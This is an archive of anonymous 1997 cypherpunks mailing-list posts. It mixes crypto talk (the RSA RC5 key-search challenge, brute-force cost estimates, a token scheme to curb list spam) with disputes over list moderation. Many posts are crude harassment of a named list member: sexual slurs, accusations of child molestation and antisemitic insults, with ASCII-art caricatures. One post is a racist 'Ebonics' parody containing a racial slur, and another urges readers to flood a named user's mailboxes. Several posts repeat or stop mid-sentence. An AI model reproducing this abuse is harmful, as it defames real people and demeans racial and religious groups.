Over on sci.crypt, Paul C. Kocker  gave a clear and
confident response to a query about the statistical difference between a
brute force attack on a known Russian or English text, versus a similar
attack on cyphertext with a known-plaintext sample (Strassmann's tell-tale
Clue Said Kocher:
The difference is negligable.  With English text encrypted under
a 64-bit block cipher, you know that the most significant
bit of each of the 8 bytes in the block should be zero.  For a
wrong key, there is a 255/256 probability that at least one of
these bits will be nonzero, allowing immediate rejection of
the key.  Keys which do produce all zero bits get tested on
additional blocks until the key is either deemed correct or
rejected.  The extra overhead per wrong key is the sum from
i=1 to infinity of i*(1/256^i), or under 0.4 percent.
In practice, the slowdown is actually a couple of percent, since
it complicates the skip-the-last-Fiestel-round optimization. Also,
the 1/256 case requires running extra code, which can fill the
microprocessor's cache with code which isn't part of
the main loop, slowing things down a bit when the computer
goes back to the main search.
____________________________________      Paul Kocher (pck at netcom.com)       |     Voicemail: +1-(415)-354-8004
Crypto consultant                  |           FAX: +1-(415)-321-1483

@_date: 1997-02-10 04:33:02
@_author: Anonymous 
@_subject: [CRYPTO] Elliptic curves 
Timothy May's father, an idiot, stumbled across Timothy May's mother, an imbecile, when she had no clothes on. Nine months later she had a little moron.
 /\/\
 \  / Timothy May
  \/

@_date: 1997-02-10 11:45:03
@_author: Anonymous 
@_subject: 40-bit RC5 crack meaningless?? 
[Excerpts from Winn Schwartau's  2/9 "InfoWar Digest," with responses to
Paul Strassmann's diatribe on the RSADS Secret-Key Challenge.  Burt
Kaliski, Tim May, Padgett Peterson -- among others -- toss in their two
bits. Longish.
[FYI: RSADS still has 12 open Challenges pending, offering cash rewards for
anyone who can decrypt 56-bit DES -- or any of eleven _other_ RC5
cyphertext samples, encrypted with keys of varied lengths, ranging from
48-bit through 128-bits. Details somewhere on the RSA site:
 ]
Paul A. Strassmann  quoted a UC Berkeley press
release on Ian Goldberg's successful effort to discover the unknown 40-bit
key to an RC5 ciphertext offered in the RSA Data Security Secret-Key
Challenge, and raised a number of justifiable concerns about whether a
contest like the Challenge is an appropriate measure of the security of a
40-bit encryption algorithm in an InfoWar environment.
Mr. Strassmann is a well known scholar of the InfoWar threat environment. I
am not, so I cannot address those specific concerns directly -- but I would
like to offer some rationale as to why the Challenge was structured as it
The RSA Data Security Secret-Key Challenge
, started last week, is an open
contest sponsored by RSA Laboratories that offers cash prizes for the
successful recovery of encryption keys for the DES and RC5 block ciphers.
Following the model of the RSA Factoring Challenge which for several years
has provided an assessment of the security of the RSA public-key algorithm
at various key sizes, the Secret-Key Challenge is intended to measure of
the security of secret-key algorithms at various key sizes.
As was the case with the Factoring Challenge, full details of the algorithms
and key sizes are provided. In addition, three plaintext-ciphertext pairs
(the ciphertext encrypted with the key of interest) are provided for each key
to be recovered.
Last week, the first of the keys in the Challenge, a 40-bit RC5 key, was
recovered by Ian Goldberg, a U.C. Berkeley graduate student. His effort
involved about 250 workstations and took 3.5 hours.  When I called Mr.
Goldberg to congratulate him in a teleconference during the RSA Data
Security Conference last week, he explained that he had discovered the
valid key with a search of about 350 billion keys, using a university
computer network to search at a rate of 100 billion keys/hour.
There are about 1 trillion 40-bit keys, for any algorithm. Mr.
Goldberg's search method involved simple brute-force; that is, the known
plaintext was encrypted with each key, and then compared to the available
ciphertext, looking for a match.
The overall effort was essentially what was expected for the 40-bit key size,
and as one would expect, the recovery of a key for the other RC5 key sizes
(from 48 bits to 128 bit), or for DES (56 bits), will involve much more work.
With the same "brute force" method employed by Mr. Goldberg last week, one
would expect a 256-fold increase in effort for each eight-bit increase in
key size. Special-purpose hardware may reduce the actual time, of course,
but the total number of possible keys to be tested will grow at that rate.
Mr. Strassman expressed concern as to whether the successful recovery of
a 40-bit key in 3.5 hours is a realistic measure of the strength of 40-bit
keys in an InfoWar environment, where full details of the algorithm and
plaintext blocks are not necessarily known. Again, not being acquainted
with the threat environment, I cannot address his concerns directly.
Nevertheless, RSA Laboratories does consider this type of contest to be
appropriate as a general measure of cryptographic strength -- for RSA's
products and those of any other vendor in the international crytographic
The information provided to RSA Secret-Key Challenge contestants is no more
than is common and conventional for any open contest to test the strength
of a cryptographic algorithm. These conventions have evolved within the
international community of cryptographers seeking, on the basis of several
acknowledged principles, to develop common criteria for measuring the
relative strength or security of any particular cryptographic algorithm
with a given key size. Our rationale for the structure of the Challenge is
reflected in the following observations:
* Knowledge of the algorithm and key size (as per Kerchoffs' principle), as
well as the availability of known plaintext, are standard assumptions in
modern cryptanalysis. Since an opponent may obtain this information
eventually, it is preferable not to rely on its secrecy when assessing
cryptographic strength.
* The implementation of large-scale key-search engines is simplified under
the standard assumptions. This makes the contest accessible to a wider
variety of contributors, than if we required contributors to know, for
instance, a particular language, or language statistics, or other
characteristics of the plaintext. (Perhaps another challenge where we didn't
provide plaintext samples would be a worthwhile follow-up.)
* In practice -- even if the plaintext is not known -- significant
information about it is likely to be, such as character distributions (ASCII,
English), header values (e.g., BER tag and length), or padding.  The cost (in
time, effort, and computing resources) of a key search with even a small
amount of information of this kind is not significantly more than the cost
with known plaintext.
For instance, if it is known that the characters are represented in ASCII,
for instance, then one can decrypt available ciphertext with each key and
check that the recovered plaintext follows ASCII conventions (most
significant bit of each byte 0). The chance that an incorrect key produces
plaintext that passes the test is 1/2^k where k is the number of plaintext
bytes recovered. This means, for example, that of 2^40 keys tried, we expect
only 2^32 to pass the check for a single eight-byte block. The 2^32 keys must
then be tested further against other ciphertext blocks.
So instead of 2^40 encryptions -- as in the case when the plaintext is known

@_date: 1997-02-11 06:44:25
@_author: Anonymous 
@_subject: 40-bit RC5 crack meaningless?? 
[Excerpts from Winn Schwartau's  2/9 "InfoWar Digest," with responses to
Paul Strassmann's diatribe on the RSADS Secret-Key Challenge.  Burt
Kaliski, Tim May, Padgett Peterson -- among others -- toss in their two
bits. Longish.
[FYI: RSADS still has 12 open Challenges pending, offering cash rewards for
anyone who can decrypt 56-bit DES -- or any of eleven _other_ RC5
cyphertext samples, encrypted with keys of varied lengths, ranging from
48-bit through 128-bits. Details somewhere on the RSA site:
 ]
Paul A. Strassmann  quoted a UC Berkeley press
release on Ian Goldberg's successful effort to discover the unknown 40-bit
key to an RC5 ciphertext offered in the RSA Data Security Secret-Key
Challenge, and raised a number of justifiable concerns about whether a
contest like the Challenge is an appropriate measure of the security of a
40-bit encryption algorithm in an InfoWar environment.
Mr. Strassmann is a well known scholar of the InfoWar threat environment. I
am not, so I cannot address those specific concerns directly -- but I would
like to offer some rationale as to why the Challenge was structured as it
The RSA Data Security Secret-Key Challenge
, started last week, is an open
contest sponsored by RSA Laboratories that offers cash prizes for the
successful recovery of encryption keys for the DES and RC5 block ciphers.
Following the model of the RSA Factoring Challenge which for several years
has provided an assessment of the security of the RSA public-key algorithm
at various key sizes, the Secret-Key Challenge is intended to measure of
the security of secret-key algorithms at various key sizes.
As was the case with the Factoring Challenge, full details of the algorithms
and key sizes are provided. In addition, three plaintext-ciphertext pairs
(the ciphertext encrypted with the key of interest) are provided for each key
to be recovered.
Last week, the first of the keys in the Challenge, a 40-bit RC5 key, was
recovered by Ian Goldberg, a U.C. Berkeley graduate student. His effort
involved about 250 workstations and took 3.5 hours.  When I called Mr.
Goldberg to congratulate him in a teleconference during the RSA Data
Security Conference last week, he explained that he had discovered the
valid key with a search of about 350 billion keys, using a university
computer network to search at a rate of 100 billion keys/hour.
There are about 1 trillion 40-bit keys, for any algorithm. Mr.
Goldberg's search method involved simple brute-force; that is, the known
plaintext was encrypted with each key, and then compared to the available
ciphertext, looking for a match.
The overall effort was essentially what was expected for the 40-bit key size,
and as one would expect, the recovery of a key for the other RC5 key sizes
(from 48 bits to 128 bit), or for DES (56 bits), will involve much more work.
With the same "brute force" method employed by Mr. Goldberg last week, one
would expect a 256-fold increase in effort for each eight-bit increase in
key size. Special-purpose hardware may reduce the actual time, of course,
but the total number of possible keys to be tested will grow at that rate.
Mr. Strassman expressed concern as to whether the successful recovery of
a 40-bit key in 3.5 hours is a realistic measure of the strength of 40-bit
keys in an InfoWar environment, where full details of the algorithm and
plaintext blocks are not necessarily known. Again, not being acquainted
with the threat environment, I cannot address his concerns directly.
Nevertheless, RSA Laboratories does consider this type of contest to be
appropriate as a general measure of cryptographic strength -- for RSA's
products and those of any other vendor in the international crytographic
The information provided to RSA Secret-Key Challenge contestants is no more
than is common and conventional for any open contest to test the strength
of a cryptographic algorithm. These conventions have evolved within the
international community of cryptographers seeking, on the basis of several
acknowledged principles, to develop common criteria for measuring the
relative strength or security of any particular cryptographic algorithm
with a given key size. Our rationale for the structure of the Challenge is
reflected in the following observations:
* Knowledge of the algorithm and key size (as per Kerchoffs' principle), as
well as the availability of known plaintext, are standard assumptions in
modern cryptanalysis. Since an opponent may obtain this information
eventually, it is preferable not to rely on its secrecy when assessing
cryptographic strength.
* The implementation of large-scale key-search engines is simplified under
the standard assumptions. This makes the contest accessible to a wider
variety of contributors, than if we required contributors to know, for
instance, a particular language, or language statistics, or other
characteristics of the plaintext. (Perhaps another challenge where we didn't
provide plaintext samples would be a worthwhile follow-up.)
* In practice -- even if the plaintext is not known -- significant
information about it is likely to be, such as character distributions (ASCII,
English), header values (e.g., BER tag and length), or padding.  The cost (in
time, effort, and computing resources) of a key search with even a small
amount of information of this kind is not significantly more than the cost
with known plaintext.
For instance, if it is known that the characters are represented in ASCII,
for instance, then one can decrypt available ciphertext with each key and
check that the recovered plaintext follows ASCII conventions (most
significant bit of each byte 0). The chance that an incorrect key produces
plaintext that passes the test is 1/2^k where k is the number of plaintext
bytes recovered. This means, for example, that of 2^40 keys tried, we expect
only 2^32 to pass the check for a single eight-byte block. The 2^32 keys must
then be tested further against other ciphertext blocks.
So instead of 2^40 encryptions -- as in the case when the plaintext is known

@_date: 1997-02-15 13:19:03
@_author: Anonymous 
@_subject: Firewalls 
The only `culture' Timothy Mayo possesses is that cultivated from his foreskin scrapings.
          \\\^^^^^///
           = 0   0 =
        -o00--( )--00o-- Timothy Mayo

@_date: 1997-02-19 16:53:48
@_author: Name Withheld by Request 
@_subject: It's time to move on, kids. 
As of 2/14/97 there are 1295 subscribers to the cypherpunks mailing list.
85 of those subscriptions are to other mail-exploders. Smoke 'em if you
got 'em.

@_date: 1997-02-19 18:11:04
@_author: Name Withheld by Request 
@_subject: It's time to move on, kids. 
As of 2/14/97 there are 1295 subscribers to the cypherpunks mailing list.
85 of those subscriptions are to other mail-exploders. Smoke 'em if you
got 'em.

@_date: 1997-02-20 10:42:28
@_author: Anonymous 
@_subject: Why Digital Video Disks are late to market 
The day it gets published in software is the day someone runs a
disassembler on it.  That's all there is to it.

@_date: 1997-02-20 12:56:41
@_author: Anonymous 
@_subject: Why Digital Video Disks are late to market 
The day it gets published in software is the day someone runs a
disassembler on it.  That's all there is to it.

@_date: 1997-02-21 23:07:21
@_author: Anonymous 
@_subject: Forgery detection 
Timmy `C' Maya's 16Kb brain's single convolution is directly wired to his rectum for input and his T1 mouth for output. That's 16K bits, not bytes. Anal intercourse has caused extensive brain damage.
          o-:^>___? Timmy `C' Maya
          `~~c--^c'

@_date: 1997-02-25 11:19:28
@_author: Anonymous 
@_subject: [ADMINISTRATIVIUM] Quadratic residues 
Timothy C[reep] Maytag's IQ is lower than the belly of a pregnant snake.
    /\
   /..\  Timothy C[reep] Maytag
  /_\/_\

@_date: 1997-02-26 18:47:18
@_author: Anonymous 
@_subject: [CRYPTO] One-time pads 
Here, Timmy C[unt] May descends into total inanity. He should have a cold shower and/or a Turkish coffee.
   /_/\/\
   \_\  / Timmy C[unt] May
   /_/  \
   \_\/\ \
      \_\/

@_date: 1997-02-28 05:59:58
@_author: Anonymous 
@_subject: Sphere packings 
Tim C[ocksucker] May's 16Kb brain's single convolution is directly wired to his rectum for input and his T1 mouth for output. That's 16K bits, not bytes. Anal intercourse has caused extensive brain              __
         ___|[]| Tim C[ocksucker] May
     \__|______|
     /-(o_o_o_o)

@_date: 1997-01-01 20:17:04
@_author: Anonymous 
@_subject: Hardening lists against spam attacks 
[snip lots of good ideas about token distribution]
A very good scheme, but why not give each subscriber a token when s/he
subscribes? Something along the lines of:
- - - - - - - - - - - - - - - - - - - -
Welcome to Cypherpunks.
Your unique token is: 0A553FC1771623109504522E31C07F44
This token must appear either as the first line of the message body or in an
X-Token: header for any mail you send to the list. Any messages sent to the
address without this information will be discarded.
Your token is initially good for  postings per day.
- - - - - - - - - - - - - - - - - - - -
Generate a token thus:
Let X be some known information like the From: line of a subscriber's message.
Let T be some unique information for each subscriber, like the exact time that
Majordomo processed the subscribe request.
Let F be the contents of some (non-changing) file on the machine running
         Majordomo (a "secrets" file).
Use a hash function H(X+T+F) to generate your token. Store the token, the
unique information (time, in my example) and the number of posts allowed per
day in a file you can use to validate user requests.
Every time a user sends mail to the list address, Majordomo checks for a token.
If there's a valid one, it strips it out and distributes the message. Otherwise
it throws it away. This way no one else sees which token was used to post a
Alice posts all the time using her real name. She just sticks her token in the
first line of her post. Majordomo sees it, validates it, and strips it out
before passing the message along. It decrements Alice's remaining message count
for the day.
Bob wants to post something anonymously. His token isn't associated with his
user ID -- the only thing Majordomo knows about it is that it's in the token
file and it's flagged as active. He sends the message through the remailer
network with his token in it, and Majordomo validates it, strips it out, and
passes the message to the subscribers, decrementing the number of messages Bob
has remaining for that day.
Charlie wants to unsubscribe from the list. He sends an unsubscribe message to
majordomo with his token in it. Majordomo uses the known information (his
"From:" line in my example), plus the time it kept from when his token was
generated and the secrets file to validate his request. If it matches up, he's
unsubscribed and his token's invalidated; if not, he's warned that someone else
tried to unsubscribe him. (In order to allow people whose tokens have been
invalidated to unsubscribe, don't make sure the token is valid -- just that it
matches up with the user.)
Mallory wants to spam the list. He subscribes and gets a token, which he
uses to
forward commercial announcements to the list. The list manager checks the logs
to see which token was used, and reduces its posting limit or invalidates it.
Mallory is no longer allowed to post, unless his token is reinstated (or he
unsubscribes and resubscribes).
Majordomo also has to keep track of how many posts have been associated with a
token in any give day, but that seems like a small problem. Users could appeal
to the list admin if they wanted a higher limit than the default. Keeping the
number fairly low also discourages protracted flamewars somewhat.
This isn't an extremely "hard" mechanism (I know it's still vulnerable to
eavesdropping attacks), but it'd preserve the ability to post anonymously and
make it tougher for spammers to decrease the S/N. Abusers would have to
unsubscribe and resubscribe repeatedly to get new tokens, which would make
them easier for the list admin to track down.

@_date: 1997-01-02 00:10:16
@_author: Anonymous 
@_subject: One-time pads 
The arrival of warm weather is heralded by the pig shit (or whatever kind of shit Intel swines have for brains) getting soft in Timmy C[rook] Mayhem's mini-cranium and the resulting green slime seeping through his cocaine- and syphilis- damaged nose and onto his keyboard.
           o_,   o
          <\__, v|> Timmy C[rook] Mayhem
    < \

@_date: 1997-01-02 19:25:21
@_author: Anonymous 
@_subject: Hardening lists against spam attacks 
Yeah, I just floated it as a trial balloon of sorts. It seemed like a way to
"harden" the list somewhat without forcing users to go to full encryption. I
had a few extra brain cells to burn off yesterday.
Your points are entirely correct, though: you have to trust the list admin, and
you have to have some faith in the Majordomo software not to retain your ID
once it generates your token. The usual eavesdropping concerns remain as well.
In your scheme, I presume one would get a blinded token (in an encrypted
message) when subscribing, and postings from non-subscribers would be checked
for a valid token? (Please correct me if I'm wrong. . .)
Probably not the worst thing in the world.
Hmm, an interesting tie-in. Maybe one could "buy" tokens to post anonymously?
It'd give new meaning to the phrase "putting your money where your mouth
is." :-)
Thanks for the feedback!
(returning to lurk mode now. . .)

@_date: 1997-01-03 10:57:45
@_author: Anonymous 
@_subject: Accounts payable 
Timothy May the self-admitted child molester possesses a rudimentary dick less than one inch long, half the size of his mother's clitoris, that barely makes a fistful. Thereby hangs the root of this Jew-hating sissy's sick fixation on little boys and Usenet forgeries.
 ____
 \ _/__ Timothy May
  \\  /
    \/

@_date: 1997-01-03 13:25:33
@_author: Name Withheld by Request 
@_subject: 'Fuck_God_Up_The_Ass' (was: invitation) 
fgle at sun1.uconect.net spammed:
I somehow doubt that Douglas has sufficient Vaseline to fulfill his
erotic fantasies!  (Or his "god" is rather small...)
How many clueless spammers need to get stung by indiscriminately
posting to spam-bait addresses planted in Usenet until they figure
out that it's a Really Bad Idea[tm]?
I've heard rumors that at least one idjit spammer lost his account
for spamming a religious mailing list with something like that!  Can
you say "oops"?

@_date: 1997-01-04 22:45:27
@_author: Anonymous 
@_subject: Oakland School Board modifies Ebonics decision 
Oakland, CA, Reuters -- Oakland School Board modifies Ebonics decision.
On Saturday, the Oakland School Board, meeting in emergency session, voted
to modify its controversial "Ebonics" program, which authorized Ebonics, or
"black English," as a second language for the purposes of teaching minority
children and for receiving federal funds for language programs. But the
program became the laughingstock of the nation, as critics pointed out, and
the White House was quick to announce that no funding for Ebonics programs
will be forthcoming. As President Clinton noted, "Hell, down in Arkansas we
got folks talkin' like that everyday, and we don't call it "bubbonics, "
now do we?"
Under pressure from the parents of the remaining white children, the
Oakland School Board has decided to add "white English," also known as
"Albonics," to the list of special languages. Under the proposal, Albonics
would be a valid language for teaching white children who are lacking
ghetto jive skills.
As School Superintendent Lavondala Rasheed-Washington explained, "Yez be
all we be sayin', know? Da honkies be sayin' ebonics be dissin' dem. We'z
be skaggin' and deyz be tootin' an shit. Dis be bad." (A translation into
Albonics was not available at press time.)
In related news, the Oakland School Board has completed work begun over the
Christmas school break to subtitle all school signs in Ebonics. The "Boys"
and "Girls" restrooms in all Oakland schools are now subtitled "Niggaz" and

@_date: 1997-01-06 10:43:33
@_author: Anonymous 
@_subject: No Subject 
> > (If you think our list is bad, you ought to see lists which are completely
 > > dominated by one-line witticisms and inside jokes....)
 >  >   Or 10,000 messages saying only, "Merry Christmas", followed a few days
 > later by another 10,000 messages saying, "Happy New Year".
 >   Anyone who needs 'proof' that I am speaking the truth, here, (and who
 > has a 10Gb hard drive), can just send me their email address, and I
 > would be glad to forward them.
     Thanks for your kind offer.  Please send the material to:
          dlv at bwalk.dm.com
(Better send several copies of each message to make sure none get
lost.)  I can also get mail at:
          aga at dhp.com
Might as well send to both accounts.
Thanks again!

@_date: 1997-01-06 11:21:01
@_author: Anonymous 
@_subject: [ADMINISTRATIVIUM] ZKP 
Tim Mayo is the living proof that anal sex causes pregnancy.
    /\ _ /\          |
  0 0  |-------\==
    \==  ____\ |
     \_-_/ _||    _||

@_date: 1997-01-07 14:59:40
@_author: Anonymous 
@_subject: Sandy is God...Listen to Him! 
Don't understand all this issue about Sandy and John filtering the list.
Don't we want order and control? We need Sandy to decide whether our
articles should be read by others.
Sandy is our spokesman, our leader, our navigator. When he founded the
Cypherpunks group, he wanted ``order and control, ``and now he has been
forced to re-assume control of the group to put controls in place.
Hey, if Sandy and John say we have to stick to certain topics, well,
dammit, they are in control and we have to do what they want.
Sandy and John are our leaders. Forget this stuff about the Cypherpunks
list being a group seperate from toad.com. Forget this idea that John is
just the host of the list...he is actually the co-controlled. And we'd
better pay attention.
Why didn't Sandy and John just announce a new filtered list, like Blossom
has? Why make their control the default for the whole list, with the the
unfiltered list harder to subscribe to and eventually to go away
completely? Good questions!
Ask not the reasons for God's decissions. This is Sandy's list, and John's
machine, and if they say they know best what is a flame and what is not, I
say we should just take our medicine and learn to love their wise
decisions. If they say we can only write flames if they approve, OK. If
they say we must only write about libertarian topics, OK. If they reject
our messages without explanation, OK.
Sandy is our Leader. And anyone who doesn't respect our Leader should just

@_date: 1997-01-08 16:54:09
@_author: Anonymous 
@_subject: [ADMINISTRATIVIUM] Sphere packings 
Timmy Maypole the self-admitted child molester possesses a rudimentary dick less than one inch long, half the size of his mother's clitoris, that barely makes a fistful. Thereby hangs the root of this Jew-hating sissy's sick fixation on little boys and Usenet forgeries.
       <<<<
      o(0-0)o
   -ooO-(_) Ooo-- Timmy Maypole

@_date: 1997-01-12 16:36:04
@_author: Anonymous 
@_subject: One-time pads 
Timmy C. May's 16Kb brain's single convolution is directly wired to his rectum for input and his T1 mouth for output. That's 16K bits, not bytes. Anal intercourse has caused extensive brain            Timmy C. May
         /-+-- --+X
        />        <\

@_date: 1997-01-13 10:57:58
@_author: Anonymous 
@_subject: [ANNOUNCEMENT] U.S.S. Liberty 
Timmy C[unt] Maya's father, an idiot, stumbled across Timmy C[unt] Maya's mother, an imbecile, when she had no clothes on. Nine months later she had a little moron.
         \\\\\|/////
          \\\\|////
          < * | * >
   *   |
           \( . )/
            \___/

@_date: 1997-01-14 03:35:26
@_author: Anonymous 
@_subject: RSA challenge: is it legal to try? 
Patents only apply to commercial use. I don't think
participating in the contest can be considered commerical use.
Me, a lawyer? No way.

@_date: 1997-01-14 14:24:34
@_author: Anonymous 
@_subject: No Subject 
They don't have to.  They will almost certainly approve almost any
non-crypto data security product for export (well, unless they want to
punish a company for domestic crypto products :-(, but I think the
commerce department can deny actually deny all a comany's exports even
without EAR).
What's really going on here is that the NSA wants to know exactly
what's out there in terms of virus protection and security software,
so that if they need to release a virus or something they know exactly
how to work around the defenses people are using.  You're not going to
too many export applications denied for this kind of stuff.  It's more
just a way for them to know exactly what's going on in that realm.

@_date: 1997-01-15 22:55:09
@_author: Anonymous 
@_subject: Quadratic residues 
Tim May the self-admitted child molester possesses a rudimentary dick less than one inch long, half the size of his mother's clitoris, that barely makes a fistful. Thereby hangs the root of this Jew-hating sissy's sick fixation on little boys and Usenet forgeries.
      \\\
     (0 0)
 _ooO_(_)_Ooo____ Tim May

@_date: 1997-01-18 14:41:34
@_author: Anonymous 
@_subject: Concerned about Pretty Safe Mail for Mac 
I'm concerned about the product "Pretty Safe Mail" for the Macintosh,
by a company called Highware. I was wondering whether anyone here had
tried evaluating it at all.
  It is a complete PGP implementation (not a front-end). They claim
to have licensed some of PRZ's code from PGP. However, as far as I
can tell, they are not making any of the source code available.
  As someone on the comp.security.pgp newsgroups pointed out, writing
a wonderful user interface on a PGP trojan horse that either crippled
the session key generator or used the session key to leak random
portions of secret key primes would be a perfect tactic for a
government wishing to penetrate PGP security. With such a great
interface, compared to the original PGP, it can't help but become
widely used.
  I realize that without the source code, it's a major hassle, but
has anyone looked at Pretty Safe Mail (previously called Safemail)
at all for suspicious behavior? For example:
  1) non-random session key generation?
  2) non-random key pair generation?
  3) unnecessary disk access to secret keys?
  4) anything else?
  Any findings, positive or negative, would be appreciated.

@_date: 1997-01-19 11:43:48
@_author: Anonymous 
@_subject: And who will "moderate" the windbag Sandfort? 
One of the biggest offendors in getting into long flamewars has always been
Sandfort himself. Why am I not surprised that most of his recent posts have
had nothing to do with crypto but a lot to do with his own flames about
And at such length, oh vey!
He said:
"First, I did not use it as a legal term of art, so a legal
dictionary is not appropriate.  Second, I see no sustantive
difference between "forejudgment" and my shorthand version
(pre-judge).  Third, I wrote "literal."  Examine the etimology of
the word for it's literal meaning.  It's pretty obvious AND
specific [ME.; OFr, /prejudice/ (Fr. /prejudice/); L praejudicium/,
from /prae/, before, and /judicium/, a judgment, from /judex/,
Blah blah blah yadda yadda yadda yadda yo momma wears army boots yadda
yadda blah blah
This longwinded flame is from a longwinded windbag. He proposes to screen
the posts of others for "suitability" but flames others ("dont be such an
ass" in another of this afternoon's posts from him) and resorts to long and
boring dissections like this one.
"I have no intention nor duty to satisfy everyone.  That is not
possible.  I will use a "reasonable person" test.  (I am, by the
way, using this in the legal term of art sense.)"
Who will moderate this "windbag"?
He thinks the list is his. It may run on Gilmour's machine, but the
"Cypherpunks" are not owned by Gilmour and Sandfort.
"P.S.    I talked to Gilmore about the holdup in getting
        started.  He has been too busy to get the tech
        side going, but when he does, (a) everyone will
        be notifed as to the start date, and the test
        will still run for an entire month.  Until then,
        it is (sadly) business as usual."
Why was this new dictatoriul policy  (especially making the moderated list
the default, instead of offering the moderated list as a new option)
announced to begin on January 11th, then?
Gilmour is probly having second thoughts (a good thing) and is just
dragging his feet.

@_date: 1997-01-24 10:07:57
@_author: Anonymous 
@_subject: Sandy dumps Igor but allows KOTM 
Sandy Sandfort, our Leader, Moderator, Guidance Counselor, Censor,  and
Speaker-to-Gilmour said:
"By the way, contrary to what Dimitri has alleged, I have posted
every message from him in which he was able to restrain himself
with regard to gratuitous insults and/or spam.  In other words,
the set of Dimitri posts that have appeared on the moderated list
is not the null set."
"Anything?  My good friend TRRCJ3 reports from San Francisco that the
city is much nicer now that so many homosexuals are 6 feet under.
"Thank God for AIDS."
(end quote from KOTM)
Nice to know Sandy is doing such an efficient job of moderating out the
"flames," such as by kicking Igor's crypto-relevant article on denial of
service attacks to the flame bucket while bending over backwards to appear
to be "fair" to KOTM.
Face it, it's a bad idea. The Cypherpunks community is not the private
sandbox of Gilmour and Sandfort, and we don't need Sandy's "guidance" to
keep us from being straying sheep. The list may currently be hosted on
Gilmour's computer, but having Sandy decide what's right for us to read is
inconsistent with Cypherpunks ideals.

@_date: 1997-01-27 16:47:11
@_author: Name Withheld by Request 
@_subject: Reuters article: "Unstoppable Internet will defy controls" 
The German law professor Alexander Rossnagel has published an article
titled "Globale Datennetze: Ohnmacht des Staates - Selbstschutz der
Buerger" (global networks: state's impotence, citizens'
self-protection) in Zeitschrift fuer Rechtspolitik 1997, p. 26 ff.
He describes that decentral networks are difficult to control, and
anonymizers, encryption and steganography can be used to defy
surveillance.  "[The state] can neither enforce matters of public
interest, nor offer protection to its citizens", including protection
of privacy and legally protected secrets.  The state cannot
effectively face law violations: "If it somewhere suppresses
information, it will be 'mirrored' by many other servers world-wide.
If it blocks communication lines, the message will find a way around.
Sattelite transmission also renders the question of location almost
irrelevant.  Theresa Orlowski was denied a license for her porn
channel here.  Now she is broadcasting from Britain.  In cyberspace,
functions of social relevance, such as protection of minors, can no
longer be fulfilled by the state.  They are transferred to the parents
"The state can only interevene where the immaterial world of the
network touches the physical world: It can arrest criminals, seize
devices and data storage, when these physically are in its control.
It can enforce adherance to its laws where it physically can exersize
its power.  But in the incorporeal world of the network, to a large
extend it is powerless.  All these examples indicate a new fact: The
networks constitute a new incorporeal social space.  Increasingly more
social contacts, economic and legal exchanges are being transferred to
it.  In it, conditions are different from in the social relationships
of the physical world.  In this new world, the state has no means of
coercion, no monopoly of power, and no sovereignty."
"Law to be enforced requires power.  The democratic constitutional
state depends on sovereignty and obediency to laws.  Only with these
it can universally enforce democratic decisions and protect the
citizens' basic rights from violations by third parties.  To guarantee
this is the fundamental reason for the modern state to exist.  Its
protective mission continues to apply.  However, it has expanded with
the civilisatoric development.  With Hobbes, the focus was on the
procetion of life and limb, with Locke the protection of freedom and
property were added, and in this century, facing new threats, the
protection of privacy.  [... The states'] sovereignty is based on the
authority to exclusively exercise physical power in [their territory].
This sovereignty has limits in the immaterial space of global
networks.  But when the citizen no longer receives the state's
protection in the special sphere of the networks and the state can no
more enforce matters of public interest there, then its basic
legitimation in so far is in danger.  According to Thomas Hobbes, 'the
citizen's obligation to the sovereign can ... only last as long as he
is capable of protecting the citizens'."  But that would also endanger
democracy and the constitional state.
Stating that the normative strategy at large is obsolete, the author
proposes new solotions: "When the democratic constitutional state can
no longer reliably protect its citizens in the new social space of the
networks, in compensation it must enable them to protect themselves."
Information and communications technology offers various means of
* encryption and steganography
* digital signatures
* untraceable pseudonyms
* certified electronic mail
* ecash
* software agents
* connectivity management programs [whatever that is...]
* cellular phones without location data
* PICS
* secure portable user-controlled devices that support these measures
"Some of these measures - for example the encryption program PGP - can
be used without any advance concession.  The state only has to abstain
from impeding regulations.  Others - such as digital signatures -
depend on an infrastructure that allows the individual to use these
protective measures.  The citizen of information society still depends
on infrastructural prerequsites.  But there is a fundamental
difference in whether the individual can decide about using
self-controlled protective measures himself, or the state or an other
large organization offers protection that he cannot influence."
"In order to protect and preserve the /old/ goals of freedom and
self-determination in the /new/ social space of the networks, law
must permit and support /new/ technologies."
The article ends with the author's vision of a 'civil information
society' as a free democratic society where basic rights are
guaranteed by technology. "In this information society, the state has
a limited, but fundamental role. [...] it creates a framework for the
citizens to protect themselves. Thus they are enabled to freely inform
themselves, solve conflicts in free self-organization, and negotiate
and practice mutual security without depending on a big brother."

@_date: 1997-01-27 19:31:39
@_author: Name Withheld by Request 
@_subject: Reuters article: "Unstoppable Internet will defy controls" 
The German law professor Alexander Rossnagel has published an article
titled "Globale Datennetze: Ohnmacht des Staates - Selbstschutz der
Buerger" (global networks: state's impotence, citizens'
self-protection) in Zeitschrift fuer Rechtspolitik 1997, p. 26 ff.
He describes that decentral networks are difficult to control, and
anonymizers, encryption and steganography can be used to defy
surveillance.  "[The state] can neither enforce matters of public
interest, nor offer protection to its citizens", including protection
of privacy and legally protected secrets.  The state cannot
effectively face law violations: "If it somewhere suppresses
information, it will be 'mirrored' by many other servers world-wide.
If it blocks communication lines, the message will find a way around.
Sattelite transmission also renders the question of location almost
irrelevant.  Theresa Orlowski was denied a license for her porn
channel here.  Now she is broadcasting from Britain.  In cyberspace,
functions of social relevance, such as protection of minors, can no
longer be fulfilled by the state.  They are transferred to the parents
"The state can only interevene where the immaterial world of the
network touches the physical world: It can arrest criminals, seize
devices and data storage, when these physically are in its control.
It can enforce adherance to its laws where it physically can exersize
its power.  But in the incorporeal world of the network, to a large
extend it is powerless.  All these examples indicate a new fact: The
networks constitute a new incorporeal social space.  Increasingly more
social contacts, economic and legal exchanges are being transferred to
it.  In it, conditions are different from in the social relationships
of the physical world.  In this new world, the state has no means of
coercion, no monopoly of power, and no sovereignty."
"Law to be enforced requires power.  The democratic constitutional
state depends on sovereignty and obediency to laws.  Only with these
it can universally enforce democratic decisions and protect the
citizens' basic rights from violations by third parties.  To guarantee
this is the fundamental reason for the modern state to exist.  Its
protective mission continues to apply.  However, it has expanded with
the civilisatoric development.  With Hobbes, the focus was on the
procetion of life and limb, with Locke the protection of freedom and
property were added, and in this century, facing new threats, the
protection of privacy.  [... The states'] sovereignty is based on the
authority to exclusively exercise physical power in [their territory].
This sovereignty has limits in the immaterial space of global
networks.  But when the citizen no longer receives the state's
protection in the special sphere of the networks and the state can no
more enforce matters of public interest there, then its basic
